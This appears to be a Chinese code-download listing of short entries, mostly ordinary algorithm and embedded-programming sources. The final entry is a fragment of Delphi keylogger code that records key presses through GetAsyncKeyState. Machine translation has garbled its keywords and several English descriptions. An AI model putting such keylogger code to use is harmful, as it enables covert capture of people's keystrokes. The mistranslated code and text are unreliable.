-
一种新的快速排序方法
一种新的快速排序方法-a new rapid sequencing methods
- 2022-02-15 13:21:48下载
- 积分:1
-
DOS下时间分辨率精确到毫秒的程序
DOS下时间分辨率精确到毫秒的程序-Source of a millisecond timer in DOS
- 2022-08-20 02:16:54下载
- 积分:1
-
最优网络01匹配算法。
最优网络01匹配算法。-optimal matching algorithm.
- 2023-08-10 15:40:03下载
- 积分:1
-
//=== === === === === ==== === === === === === === =// letter Description// func...
//=== === === === === === =====
//函数说明
//函数名称:Correlation
//函数功能:计算最小二乘法拟合的多项式的相关系数
//使用方法:int M------ 拟合多项式的阶数(已知条件)
// double *b--- 拟合曲线的系数,排列顺序为由高阶到低阶(已知条件)
// double *x--- 结点x轴数据(已知条件)
// double *y--- 结点y轴数据(已知条件)
// double *Yg-- 结点估计值,个数为m(过程变量)
// int m------ 结点个数(已知条件)
//注意事项:多项式阶数最高为10,多项式的形式为 y = a0 + a1x +a2x2
-//=== === === === === ==== === === === === === === =// letter Description// function name : Correlation// Function functions : Calculation least squares polynomial fitting of the correlation coefficient// Use : int M------ polynomial fitting stage (known condition)//* b--- double fitting song The coefficient, Higher-order the order on grounds of low order (known condition)//* double-node x x axis data (known to be pieces)// double* y--- node y-axis data (known condition)//* double FSL-- Nodes estimates, Number m (process variables)// int m------ node number (known condition)// Note : polynomial order of a maximum of 10. polynomials in the
- 2022-04-29 13:08:12下载
- 积分:1
-
二维码解码器程序源码
QRcode二维码解码器程序源码本源码实现可以在vc中使用的1D/2D编码解码器。条形码的应用已经非常普遍,几乎所有超市里面的商品上面都印有条形码;二维码也开始应用到很多场合,如火车票有二维码识别、网易的首页有二维码图标,用户只需要用手机扫描一下就可以看到手机版网易的网址,免去了输入长串字符的麻烦。条形码的标准:条形码的标准有ENA条形码、UPC条形码、二五条形码、交叉二五条形码、库德巴条形码、三九条形码和128条形码等.
- 2022-03-19 11:29:10下载
- 积分:1
-
给定n个结点的有向图的邻接矩阵,可判断该图是否为强连通的,单向连通的,或弱连通的。...
给定n个结点的有向图的邻接矩阵,可判断该图是否为强连通的,单向连通的,或弱连通的。-For a given n-node directed graph adjacency matrix, can determine whether the plan strongly connected, and one-way connected, or weak connectivity.
- 2022-08-16 01:43:17下载
- 积分:1
-
separate speakers detection based on energy calculation
这个函数实现了一个简单的语音检测器。算法是
- 2023-08-09 22:25:03下载
- 积分:1
-
The right to evaluate the entropy
熵权评价 熵权评价 熵权评价-The right to evaluate the entropy
- 2023-04-19 23:30:03下载
- 积分:1
-
基于c实现单片机的键盘控制
本代码主要实现了基于89c52单片机实现矩阵键盘的程序,主要体现了分为横扫描以及竖扫面的主体思想,实现对矩阵键盘的控制,并结合数码管的显示来验证此程序的正确性。在使用此程序之前,要人为的去修改硬件资源程序部分,使之程序的思路是根据此程序来的,但是具体的硬件资源是根据手里所有的开发板来进行修改的,这样可以很好的适合于每个平台。此代码为c代码有很好的移植性以及易懂性
- 2022-06-26 14:01:57下载
- 积分:1
-
通过 Delphi Keyloger 代码
程序 Send(x: string);
开始
form1。Memo1.Lines.Add(x)
结束 ;
程序 TForm1.Timer1Timer(Sender: TObject);
//begin
//if GetAsyncKeyState(Ord("A")) =-32767 然后 send("A") ;
//if GetAsyncKeyState(Ord("B")) =-32767 然后 send("B") ;
var X,y:integer ;
f:char ;
str:string ;
开始
X: = 0 到 255 做
开始
- 2022-06-29 21:37:30下载
- 积分:1